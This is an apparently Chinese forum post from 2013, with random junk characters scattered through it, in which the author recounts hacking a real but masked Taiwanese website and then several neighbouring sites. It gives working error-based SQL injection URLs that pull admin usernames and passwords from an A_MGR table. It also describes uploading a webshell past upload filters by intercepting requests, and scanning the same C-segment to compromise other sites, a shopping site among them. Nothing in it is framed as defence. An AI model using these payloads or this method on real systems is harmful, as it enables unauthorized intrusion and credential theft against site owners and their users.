发现一个注入点* w7 m+ I- |# e( k+ P( w" c' D8 n
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
% ]% m" ` U i' ~6 k9 i8 F
) Q) _. Q9 ^+ i习惯性的加’having1=1--
& d8 `" \& B5 I+ d! H: f, j
! D3 x- J! P; x Y7 R y: N- }http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—: u" P1 ^; d- N- s' N( l: h. P
, V8 h2 @2 X3 }* A6 Z: I: `# |0
8 h7 s# r+ Y4 ~6 }5 S7 {* [6 {2 F) u6 N
爆出Diary_A.dl_Title(这时候很激动啊)
+ M1 |. J5 i+ H
" c4 J3 a/ z; \. P: R8 b那么继续$ n5 Q' m! z3 [* r3 r3 L; Z
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—' [+ O# n P1 @& r* ^3 F2 H+ R
8 i$ Z% t/ Q, W$ N) S; n
继续,一直爆下去+ j [8 t! o* B4 ]
: o" s1 l' ?; x! e. ~' I5 p爆到几个字段和表段 但是没找到需要的管理用户的字段
! }2 S; b0 w/ H
! h4 q; T5 @& y2 [# I# y. \蛋疼了 怎么办 然后去后台登陆页看源码
8 p! E8 @; c2 x5 E' l3 E, {1 `# h" P, b% V2 @
0
2 V% c H9 i- c8 c( [. Y5 H0 ^1 E" Q$ _* V! X; x5 Q: g
Input name= “ADUID”
) i# H) F$ o' ]1 g, E1 r6 I7 c& CInput name= “ADPWD”+ x* o6 d3 x1 n0 t y: }
. s6 J2 u! A- q! a; Z
很幸运 找到了字段那就继续5 r7 z1 G% U2 z0 X' i1 ~
找到之后开始爆用户, X W0 s* u& n8 Z
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—) K, E) @- q) n. \! N3 a8 [
爆密码
8 Y/ y8 S3 g8 ?" S# [8 D2 K3 [4 s; Hhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—8 G4 G$ p5 p7 @
测试了下 这个注入点只能爆到文章哪里的表
' a G; B) i8 c7 u; M5 l3 x/ F m
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
" _7 T# L. H( |- l& w
s" @# ]8 n0 n又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
w7 |9 }( `. k& c0 _0 C9 {( j1 i p7 C, K" {
4732 Q9 N7 w) X; V0 S( Q
4 L$ x5 \$ V- a: E f进后台
1 G! e/ V& k3 b% s, _, b! j$ O( E) g& X1 d% _* N0 M
1 A5 {4 B! a8 Y6 U( A
发现几个上传点 有的地方不能上传 而且防止恶意代码
, v8 D% x7 t& T) q/ Y
- i1 k; s+ N+ g/ G' P1 F. L# _没办法 各种百度各种找大牛 找到一只好像可以突破的马
# Q5 K5 I4 @& C- M+ Z9 l8 B7 Z
9 w6 o3 u8 P. m' N$ f2 y8 q) \1 M! ]; Y
在系统管理那里直接上传 不过没有显示地址" I$ m% A, a5 X4 Z
2 ~' b) C# n2 B9 m- n5 @5 K, `
再上传一次 抓包 搞定OK
4 {% i7 ^! n( G* |/ Q$ S2 @% z# N
5 S- A0 J- \! J5 B* x4 k
0 b1 D) w/ u) q) f4 b0 K- o- _7 [7 C5 b; l2 o. t* S C" h
472" U+ s+ Y: Y( l
/ l' l# a n' ^- E$ {1 m! A( Q9 e晚上不行了 去睡觉。。。
1 m: ~3 b! d' {4 ?" @! `第二天刚起床 闲的没事做继续日站吧
" }/ p, ?5 z! M- @
4 P' ~) q7 n' r9 R找个站 就把这个站的旁c扫了下8 e5 K2 \# m- T
& ] D. ~8 S. T, I9 O$ R发现c段也有一个购物站 ,然后还和这个站的模板差不多
* g! S2 `/ M* A9 t! ^* S" u
f: |' Z8 } w" I; N% @% i就找到会员登录口测试5 T- [7 w& v. `7 o" q( a' |8 l
1 R9 e& b3 T5 b3 q; K- u
'and (select top 1 MGR_UID from A_MGR)>0—) X! |) i+ ?, ?$ V8 P# C
果断爆到了 这时候我很激动 通杀
" N7 B/ n* c a
0 _+ f1 j0 R, [再次翻c段% s$ b4 X* I; _4 ~
- i7 ?: D8 A2 t: Y0 e' g
翻出几个站 都成功拿下2 m" S9 S1 S$ {; T' K( z7 I
5 F. X7 W: U* x
/ s# z6 }, _; G; q) b0 \/ i _3 i
. x @% y: C: x( t
修复方案:
' K# c( ?/ g' k, _/ F9 p5 ~0 \5 J1 n& _他们比我专业
6 o B: e- X; h- ]4 Q" m1 l6 b, n9 ^9 F! n+ A( w3 u7 D2 |
" m: O" J' y$ `8 `
9 [3 U% t4 w5 a) H6 l& @, L5 _/ } |
发表于 2013-4-4 17:40:38
收藏
分享
支持
反对